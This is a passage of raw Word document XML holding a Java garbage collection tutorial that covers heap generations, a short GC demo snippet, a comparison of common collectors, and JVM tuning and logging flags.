          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or needed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79FA0D" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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is performed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM (Java Virtual Machine)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>free up heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and prevent memory leaks, so developers don't have to manually manage memory (unlike in C/C++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F21EC0" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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y is GC Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892A1E9" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A52B8" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Frees memory from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unused objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002425FA" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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mproves </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1A617" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Reduces chances of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E362D" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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How GC Works (High-Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFA41C" w14:textId="77777777" w:rsidR="001A62DB" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Java objects are stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0E9AA" w14:textId="77777777" w:rsidR="001A62DB" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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no references point to an object, it becomes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327ED31D" w14:textId="717647E4" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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JVM periodically runs the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage Collector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687775D" w14:textId="77777777" w:rsidR="001A62DB" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Finds </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unreachable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9C236" w14:textId="77777777" w:rsidR="001A62DB" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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claims their memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBBC901" w14:textId="11253833" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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acts memory (optional, depending on collector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8FBB8" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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JVM Memory Areas (relevant to G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31"/>
        <w:gridCol w:w="4491"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="39CC86DD" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BDD905E" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="00E16D06">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rea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF84DC5" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="00E16D06">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2B008F" w:rsidRPr="00CE4B95" w14:paraId="450CDD63" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765E8F58" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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Young Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24AE129D" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ew objects created (faster GC – minor GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="0BE46D7B" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1995FC54" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ld Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FDE26E" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ng-lived objects (slower GC – major GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="64B4DC51" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5548C127" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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aspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6326DB38" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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metadata (not garbage collected as objects)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0974FBA0" w14:textId="6362EDFC" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E5E7B0" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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15C5C26E" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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GCDemo</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EC0A384" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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F4DE994" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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t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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B069874" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        st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Now eligible for GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17134AC6" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A283CFC" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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Hint to JVM to run GC (not guaranteed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B86C15" w14:textId="77777777" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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23146AC" w14:textId="5EB9583A" w:rsidR="00E16D06" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB7759" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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mmon Garbage Collectors in Jav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9"/>
        <w:gridCol w:w="5861"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="70E58A50" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DE74D6" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="0070386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GC Algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="553517F9" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="0070386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2B008F" w:rsidRPr="00CE4B95" w14:paraId="256C138B" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F81D9E" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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rial GC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3995084C" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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mple, single-threaded. Good for small apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="3C15EE63" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E367D5C" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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rallel GC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B73FF4C" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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s multiple threads for minor/major GC. Good for throughput.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="622FBB8F" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30671565" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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MS (Concurrent Mark-Sweep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAC9DD4" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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inimizes pause times (deprecated).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="59B2D3FC" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C3B4C5E" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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G1 GC (Garbage First)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69ED8FCE" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ood balance of performance and low pause times.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="36C14B11" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C7B57F1" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ZGC</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shenandoah</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E999E1" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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ltra-low pause times (Java 11+ / 12+).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3069AE75" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002B008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214D393">
          <v:rect id="_x0000_i1292" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61568BD4" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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GC Tuning (Optional for advanced users):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F2F3D" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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 tune the JVM GC behavior using flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8AD27" w14:textId="6B339F19" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7D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7311091"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">java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Xms512m</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Xmx2g</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XX</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UseG1G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App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E0F0D" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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How to Know if GC Is Happening?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD40677" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47618D8A" w14:textId="77777777" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7D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2937037"/>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verbos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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2D9DA" w14:textId="6DFD3E28" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7D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2937037"/>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XX</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PrintGCDetails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BD07F" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B0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tools like:</w:t>
